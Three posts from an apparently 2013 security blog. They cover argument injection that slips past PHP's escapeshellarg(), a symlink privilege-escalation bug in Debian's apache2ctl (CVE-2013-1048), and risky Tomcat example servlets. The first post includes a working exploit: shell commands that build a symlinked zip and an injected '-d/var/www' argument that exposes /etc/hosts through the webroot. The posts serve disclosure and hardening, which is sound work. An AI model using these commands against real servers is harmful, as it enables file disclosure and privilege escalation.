воскресенье, 24 марта 2013 г.

Breaking escapeshellarg() news

PHP function escapeshellarg() is the most popular way to prevent OS Commanding threats during shell calls by escaping command arguments.

But this function is not a panacea, and you should keep this in mind when using it.

Let's try to understand what this escaping function is doing:
  1. Performs framing quotes string: aaa -> 'aaa'
  2. Cuts bytes 0x00, 0x80-0xFF
  3. Escape single quotes: ' -> ''\'''
This guaranteed to create one console line argument from a string.
So, looks like ideal solution, right?

But there are no restrictions on characters in this line argument. For example, command line argument after escapeshellarg() filtration can be a command key (-a, -o and others). This is the first trick.

Second trick is argument parser which embeded in command line utilities.

Feel it:
$command -arg param
$command -arg=param
$command '-arg=param'
$command '-arg param'

There are no differences between these four examples for most command line utilities! Pay your attention to two last command lines, - you can put these lines after escapeshellarg() filtration.

   exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
Is it code protected from hackers? Try to check this in terminal by typing:
$ unzip -j '-d/var/www/' *.dat -d /tmp

This command will extract files with masks '*.dat' (all matches after first), '-d', '/tmp' from ZIP arhieve with filename *.dat to output folder /var/www.

Preparing exploit:
$ ln -s /etc/hosts 2.dat
$ zip --symlinks 1.zip 2.dat
$ mv 1.zip 1.dat

You can also add file with name '-d' to archive to make attack more stable (w/o needs of upload 1.dat and 2.dat both for exploit).

Try it:

$ unzip -j '-d/var/www' *.dat -d /tmp
Archive:  1.dat
    linking: /var/www/2.dat  -> /etc/hosts
finishing deferred symbolic links:
  /var/www/2.dat -> /etc/hosts
caution: filename not matched:  -d
caution: filename not matched:  /tmp

Now you can read files by +FollowSymlinks              -------------->

вторник, 5 марта 2013 г.

Analysis of CVE-2013-1048

Today we were very surprised by vulnerability CVE-2013-1048 in Apache web-server. This issue was described in Debian Security Advisory DSA-2637-1 by following notes:

Hayawardh Vijayakumar noticed that the apache2ctl script created the lock directory in an unsafe manner, allowing a local attacker to gain elevated privileges via a symlink attack. This is a Debian specific issue.
First looks at last line of quote - only Debian systems were affected.

Lets try to analyse patch for this bug:

As you can see, install command was replaced to mkdir_chown function which contains many security checks.

Lets try to understand what happens where "install -d -o www-data /var/lock/apache" called.

This command creates directory /var/lock/apache and that set chown www-data to this directory.

But if this directory was already created as a symlink to another directory (/var/lock have a+w privileges), install command change privileges to this directory. Simplest exploitation way is create directory /var/lock/apache as a symlink to /etc/ directory and than delete /etc/shadow file and recreate it with yourself content under www-data user privileges.

суббота, 2 марта 2013 г.

Tomcat Servlet Examples threats

Tomcat application server by default contains "/examples" directory which has many example servlets and JSPs.
We strongly recommend to disable public access to this directory by following security reasons:

  • Bypassing HttpOnly Cookies protection
  • CSRF cookies manipulation
  • Session manipulation
HttpOnly flag must protect user's cookies from client-side attacks such as XSS. There are two example servlets in Tomcat which shows all cookies in plain/text HTTP response:
  • /examples/servlets/servlet/RequestHeaderExample
  • /examples/servlets/servlet/CookieExample
Second servlet also provides CSRF-based cookie manipulations: set/redefine by GET and POST requests both.

Session manipulation is more interesting. Looks at /examples/servlets/servlet/SessionExample servlet. It is simplest way to gain admin privileges in target webapps which hosted on same Tomcat with SessionExample servlet.

Session is global and this servlet provides you any manipulations with your session!
We strongly recommend to disable public access to /examples directory again.